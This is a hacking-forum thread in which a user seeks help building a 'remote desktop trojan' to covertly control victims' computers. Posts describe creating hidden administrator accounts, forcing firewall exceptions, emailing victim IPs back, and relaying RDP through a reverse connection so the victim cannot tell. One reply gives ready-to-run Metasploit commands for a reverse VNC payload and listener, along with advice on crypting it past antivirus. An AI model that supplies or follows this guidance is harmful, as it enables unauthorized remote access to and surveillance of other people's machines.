EvilZone

Hacking and Security => Hacking and Security => : Infinityexists March 15, 2012, 04:51:02 PM

: Remote Desktop Trojan
: Infinityexists March 15, 2012, 04:51:02 PM
How Remote Desktop Trojan work , does it enable the port 3389 itself inside the Victim Router configuration , if no then how it works :S
since if i want to code my own , it is only possible if the victim has enabled Router Port of 3389
: Re: Remote Desktop Trojan
: gh0st March 15, 2012, 05:10:11 PM
well its very difficult to stablish a connection from your computer directly to victims computer and that is because the router has like a firewall that stops any income connection okay if you want to go deep you will have to use a 0 day exploit to pass the firewall now you have to code a packet sender to send a raw network packet in order to exploit a specific protocol service (TCP/UPD) like of an AV update protocol or even a msn protocol that part is very hard I know the teory very good but Ive tried once but I took an arrow to the knee...
here is an example of one of those candys:
http://www.zerodayinitiative.com/advisories/ZDI-12-033/
you will have to learn cryptography of protocols and routers If Im not wrong and of programming networking to send the packet ,reverse engieenering for analyzis of the protocol good luck
: Re: Remote Desktop Trojan
: Infinityexists March 15, 2012, 05:28:07 PM
well its very difficult to stablish a connection from your computer directly to victims computer and that is because the router has like a firewall that stops any income connection okay if you want to go deep you will have to use a 0 day exploit to pass the firewall now you have to code a packet sender to send a raw network packet in order to exploit a specific protocol service (TCP/UPD) like of an AV update protocol or even a msn protocol that part is very hard I know the teory very good but Ive tried once but I took an arrow to the knee...
here is an example of one of those candys:
http://www.zerodayinitiative.com/advisories/ZDI-12-033/ (http://www.zerodayinitiative.com/advisories/ZDI-12-033/)
you will have to learn cryptography of protocols and routers If Im not wrong and of programming networking to send the packet ,reverse engieenering for analyzis of the protocol good luck


is it possible with telnet to add the port in router setting ?
: Re: Remote Desktop Trojan
: ca0s March 15, 2012, 05:38:21 PM
well its very difficult to stablish a connection from your computer directly to victims computer and that is because the router has like a firewall that stops any income connection okay if you want to go deep you will have to use a 0 day exploit to pass the firewall now you have to code a packet sender to send a raw network packet in order to exploit a specific protocol service (TCP/UPD) like of an AV update protocol or even a msn protocol that part is very hard I know the teory very good but Ive tried once but I took an arrow to the knee...
here is an example of one of those candys:
http://www.zerodayinitiative.com/advisories/ZDI-12-033/
you will have to learn cryptography of protocols and routers If Im not wrong and of programming networking to send the packet ,reverse engieenering for analyzis of the protocol good luck
Ohmy. He's not talking about exploiting an active RD server (these days there is a lot of activity on this :P). He's talking about infecting a machine and have RD access.

You have two ways:
a) Code your own RD manager. You will have to send screen images, catch events, send events, and shit. bubzuru made this: http://evilzone.org/evilzone-releases/silent-vnc-%28official-thread%29/msg11161/#msg11161
b) Just add an account and enable windows' RD. Send your IP back. But as gh0st said, you will probably not be able to connect due to the router's firewall. I don't know if MS RD allows working in reverse mode.
: Re: Remote Desktop Trojan
: Infinityexists March 15, 2012, 05:53:04 PM
Ohmy. He's not talking about exploiting an active RD server (these days there is a lot of activity on this :P ). He's talking about infecting a machine and have RD access.

You have two ways:
a) Code your own RD manager. You will have to send screen images, catch events, send events, and shit. bubzuru made this: http://evilzone.org/evilzone-releases/silent-vnc-%28official-thread%29/msg11161/#msg11161 (http://evilzone.org/evilzone-releases/silent-vnc-%28official-thread%29/msg11161/#msg11161)
b) Just add an account and enable windows' RD. Send your IP back. But as gh0st said, you will probably not be able to connect due to the router's firewall. I don't know if MS RD allows working in reverse mode.


i know how to create a hidden administrator account and all that but i stuck on that Router thing :/ this is totally messing me up , wonder how applications like TeamViewer , Join.me works :/
: Re: Remote Desktop Trojan
: ca0s March 15, 2012, 06:02:13 PM
I don't know.
VPN? Just guessing.
: Re: Remote Desktop Trojan
: puddi March 15, 2012, 07:07:06 PM
just find out their passwords and use teamviewer bro.
: Re: Remote Desktop Trojan
: Kulverstukas March 15, 2012, 07:14:19 PM
How does teamviewer work is a mystery, although for viruses this technique is called "Reverse connection" - instead of you connecting, a virus connects to you. This works because the router firewall usually with default configuration blocks incoming traffic, but not outgoing.  Windows firewall blocks both (usually it asks you what to do), but there are lots of methods to add yourself into an exception list.

Remote desktop trojan is simpler because (the way I see it) it just enabled and configures the RDP on a windows machine then sends the info back to you, or it doesn't if it's coded to set static passwords everywhere.
: Re: Remote Desktop Trojan
: gh0st March 15, 2012, 07:29:25 PM
teamviewer for example first send a request for connection to a specific port then if its confirmed both machines will be able to exchange network packets those packets are simply bites of pixels which will be placed on a matrix with the objective of show an output (the live remote desktop that you see) and ofc the orders for example move the mouse,etc.
the speed of the connection will depend on the internet download and upload speed if it downloads for example 10mb per second and the pixels bites are low then the desktop vision will be very fast but if for example if you have a low connection and a low download speed for example as me: less than 1mb T.T on the other hand if the bites of the pixels are high for example a desktop within someone playing dota 2 it will be very laggy and hard to see Im gonna give you a more underestandable sample
for example :
on youtube you have the option to low the pixels of the video in order to make it faster right? but if you turn it up it will be more delayed because of the size of the pixels that will be put on a matrix which is part of the source code of youtube
so is it clear now?
: Re: Remote Desktop Trojan
: gh0st March 15, 2012, 07:44:27 PM
http://www.youtube.com/watch?v=-3Rt2_9d7Jg&feature=related
: Re: Remote Desktop Trojan
: noob March 15, 2012, 10:03:07 PM
http://evilzone.org/security-tools/silent-vnc-1-1-%28alpha%29/
: Re: Remote Desktop Trojan
: Infinityexists March 16, 2012, 12:50:48 PM
@Professor Potato : You're an idiot.



How does teamviewer work is a mystery, although for viruses this technique is called "Reverse connection" - instead of you connecting, a virus connects to you. This works because the router firewall usually with default configuration blocks incoming traffic, but not outgoing.  Windows firewall blocks both (usually it asks you what to do), but there are lots of methods to add yourself into an exception list.


Remote desktop trojan is simpler because (the way I see it) it just enabled and configures the RDP on a windows machine then sends the info back to you, or it doesn't if it's coded to set static passwords everywhere.


so far i've understood that,


Victim PC will send the remote Connection request to me no matter if he/she has his RDP port enabled, i'd be able to connect to its PC as long as the connection is incoming to me .


WhaooW this sounds fucki'n awesome !




Here is what i can do,


I can create the Hidden Administrative account into victim's PC , now victim has to do is to send me the RDP request (this could be done using VBscript/BFP (batch file programming) )
now in order to connect to victim's pc RDP port must be enabled into my Router no matter if it is enabled or disabled into Victim's router ? Right ?


Correct me if i am wrong !


but this way victim could connect to my PC , how would i connect to the victim's PC instead ?


btw , this is the PERFECT answer to my question ! :)
: Re: Remote Desktop Trojan
: puddi March 16, 2012, 01:57:48 PM
@Professor Potato : You're an idiot.
bro why waste countless hours when you can use teamviewer bro? who's the idiot now bro?
: Re: Remote Desktop Trojan
: Kulverstukas March 16, 2012, 02:39:28 PM
bro why waste countless hours when you can use teamviewer bro? who's the idiot now bro?
Still you.
: Re: Remote Desktop Trojan
: Infinityexists March 16, 2012, 07:31:13 PM
Still you.


you might have missed my post, could u please answer it ?
: Re: Remote Desktop Trojan
: Kulverstukas March 16, 2012, 08:36:06 PM
I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.
: Re: Remote Desktop Trojan
: Infinityexists March 16, 2012, 11:15:51 PM
I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.


Don't worry about that bro, its not gonna have any additional file , it will be fully compiled/encrypted into a single executable file.
the only problem i want to resolve right now if the connection is reverse how i'd be able to look into the victim's PC,
if it is possible i'll find out :)


I've already generated a simple VBscript code to add exception into Windows Firewall to allow RDP connection / FTP request , and if the exception is already blocked by the Victim then instead of adding a new exception it will override the already defined exception and set it status to 'Allow'
:)
: Re: Remote Desktop Trojan
: Kulverstukas March 17, 2012, 05:05:16 PM
If you are enabling the windows default RDP then I guess you don't need to put exceptions in the Firewall. You don't even need to do anything else I think. Just enable the RDP with settings you want, then let the virus send the info back to you, like the IP, port, user and password - this might be tricky, maybe email?
: Re: Remote Desktop Trojan
: Infinityexists March 17, 2012, 05:46:02 PM
If you are enabling the windows default RDP then I guess you don't need to put exceptions in the Firewall. You don't even need to do anything else I think. Just enable the RDP with settings you want, then let the virus send the info back to you, like the IP, port, user and password - this might be tricky, maybe email?


Easy as pie ;) it will be done
: Re: Remote Desktop Trojan
: ande March 18, 2012, 06:05:27 AM
Let me just start of by saying that I really do not know how to start this reply. This topic contains so much retarded text and information written in a manner that should never see they light of day.

The things discussed in this topic is basic networking knowledge. Not the RDC part, but the WAN/LAN/routing part.


To start of I will answer the original topic question;
How does Remote Desktop trojan work? Does it enable the port 3389(default) itself at the victims router configuration? If not, how does it work? Since if i want to code my own, it is only possible if the victim has enabled Router Port of 3389?
(quote above is not original, corrected quite a lot.)
<rant>
When you use commas, use them correctly. It is not "word , word" or "word,word" or "word ,word". It is "word, word".
One does not use capital letters in words that are not names, locations, abbreviations and a few other exceptions.
Use punctuations.
Use question marks.
Use line breaks.
DO NOT USE THE WORD "BRO" OR ALIKE.

This may not be as annoying to you and people writing like yourself right now. But once you stop writing like a fool and start writing understandable, it is a real mother-fucking-pain in the ass.
</rant>

Now on to your question:
Very very few applications/services auto forward their ports in routers and Microsoft's remote desktop control service is not one of them. This is simply because there are no standards for this(I am sure there are more reasons for it as well). All routers(most) are different from one another and so forth.
However, there are something called UPnP which allows for temporarily port forwarding. Various torrent clients and so forth use UPnP to allow file exchange. I suggest you look into that, or use reverse connection technology.

In reply to your this part of your question(", if no then how it works :S"): If you are in a LAN and separated from the Internet by a router or other means of network separation, you have to configure your separation device(s) to forward specific ports and or addresses to the correct machine inside the LAN and then connect to the routers public IP(often revered to as port forwarding).

I would suggest you look away from most other replies than mine in this topic as they are just confusing and or wrong. I would also suggest you do the first part of a CCNA Cisco certification or something along those lines. Not saying that you need to have a deep understanding of everything before moving on, but its a smart choice if you do.

I would also like to apologize for any offense people will take from this as I know people will. The 'rant' section of this reply is a general reply to all rubbish-writers. I do not mean to offend anyone, but I just can't stand people who can't write properly. Even though I have been there and done that.
: Re: Remote Desktop Trojan
: Infinityexists March 19, 2012, 10:55:56 PM
Let me just start of by saying that I really do not know how to start this reply. This topic contains so much retarded text and information written in a manner that should never see they light of day.

The things discussed in this topic is basic networking knowledge. Not the RDC part, but the WAN/LAN/routing part.


To start of I will answer the original topic question;
(quote above is not original, corrected quite a lot.)<rant>
When you use commas, use them correctly. It is not "word , word" or "word,word" or "word ,word". It is "word, word".
One does not use capital letters in words that are not names, locations, abbreviations and a few other exceptions.
Use punctuations.
Use question marks.
Use line breaks.
DO NOT USE THE WORD "BRO" OR ALIKE.

This may not be as annoying to you and people writing like yourself right now. But once you stop writing like a fool and start writing understandable, it is a real mother-fucking-pain in the ass.
</rant>

Now on to your question:
Very very few applications/services auto forward their ports in routers and Microsoft's remote desktop control service is not one of them. This is simply because there are no standards for this(I am sure there are more reasons for it as well). All routers(most) are different from one another and so forth.
However, there are something called UPnP which allows for temporarily port forwarding. Various torrent clients and so forth use UPnP to allow file exchange. I suggest you look into that, or use reverse connection technology.

In reply to your this part of your question(", if no then how it works :S"): If you are in a LAN and separated from the Internet by a router or other means of network separation, you have to configure your separation device(s) to forward specific ports and or addresses to the correct machine inside the LAN and then connect to the routers public IP(often revered to as port forwarding).

I would suggest you look away from most other replies than mine in this topic as they are just confusing and or wrong. I would also suggest you do the first part of a CCNA Cisco certification or something along those lines. Not saying that you need to have a deep understanding of everything before moving on, but its a smart choice if you do.

I would also like to apologize for any offense people will take from this as I know people will. The 'rant' section of this reply is a general reply to all rubbish-writers. I do not mean to offend anyone, but I just can't stand people who can't write properly. Even though I have been there and done that.


I want to use a Reverse Connection Technique to connect to the PC,
I've coded the complete program that when runs created a new hidden Administrator account with the password of my choice inside the victim computer and then email me the victim IP address and computer name but what to do after that i need any ideas of reverse connecting through Remote Desktop so even if I receive RD request from the victim he wouldn't even know what has happened and he won't be able to see my desktop rather I would be able to see his desktop or even if i can browse Victim PC.


The Remote Desktop connection could easily be executed in the background using mstsc  command with blah blah parameter.
: Re: Remote Desktop Trojan
: ande March 20, 2012, 01:09:02 AM
The concept of reverse connection does not mean that you reverse the action being performed. Only the connectivity establishment. I assume you are using the windows remote desktop control crap which means there are no inbuilt reverse connection and you are pretty much screwed.

You could however, though I think its a little bit out of your skill capacity still. Create a software solution to overcome this:
Instead of connecting to your victims IP, you connect to your localhost where there will be a program listening. This program at the same time listens to a remote port which a second program running on your victims computer are constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program making the other program connect to localhost on your victims computer. Once all the above have been done, the programs will not do anything other than passing traffic along. Piping your remote desktop control client to your victim's remote desktop control server.

Client <-> Local program <- INTERNET -> Victim program <-> Server
: Re: Remote Desktop Trojan
: noob March 20, 2012, 02:57:12 AM
Why dont you try reverse VNC session with metasploit:


Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 X > /tmp/reverse-vnc.exe

Listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 DisableCourtesyShell=TRUE E

Ofcourse this will be detected by AV if you dont know how to crypt it.
: Re: Remote Desktop Trojan
: Infinityexists March 21, 2012, 05:14:25 PM





you connect to your localhost where there will be a program listening. This program at the same time listens to a remote port which a second program running on your victims computer are constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program making the other program connect to localhost on your victims computer. Once all the above have been done, the programs will not do anything other than passing traffic along. Piping your remote desktop control client to your victim's remote desktop control server.


Client <-> Local program <- INTERNET -> Victim program <-> Server




The quoted part sounds really interesting, I understand a bit of it,


OK first , I connect to my localhost using xampp but what exactly does that mean 'there will be a program listening This program at the same time listens to a remote port which a second program running on your victims computer'


could you elaborate or give me any clue where i can read more about it ?
I actually need a proper example about this.


Why dont you try reverse VNC session with metasploit:




Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 X > /tmp/reverse-vnc.exe


Listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 DisableCourtesyShell=TRUE E


Ofcourse this will be detected by AV if you dont know how to crypt it.


payload, listener thing are way out of my knowledge :D
but i'd love to look into it if you can tell me more or link me to the basics :)
: Re: Remote Desktop Trojan
: noob March 21, 2012, 10:49:42 PM
http://evilzone.org/video-tutorials/%28community-edition%29-metasploit-framework-expert-certification-dvd/